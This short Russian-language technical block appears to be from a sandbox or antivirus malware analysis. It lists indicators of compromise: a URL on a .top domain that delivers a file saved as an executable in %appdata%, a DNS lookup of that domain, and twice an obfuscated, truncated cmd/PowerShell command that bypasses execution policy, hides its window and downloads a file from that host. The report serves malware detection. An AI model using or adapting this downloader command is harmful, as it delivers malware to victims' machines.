Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powERsh^El^L.^EXe -E^xecuTiON^pO^lICy B^yP^As^S^ -N^op^R^of^ILe ^-^WI^nD^o^wstyL^e ^h^iDDEN (^New-obJEc^T^ sY^sT^EM.N^E^T.weB^CLI^ENt^).^dOW^n^l^oAD^F^ilE('http://www.vopergooda....
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /c "powERsh^El^L.^EXe -E^xecuTiON^pO^lICy B^yP^As^S^ -N^op^R^of^ILe ^-^WI^nD^o^wstyL^e ^h^iDDEN (^New-obJEc^T^ sY^sT^EM.N^E^T.weB^CLI^ENt^).^dOW^n^l^oAD^F^ilE('http://www.vopergooda....' (со скрытым окном)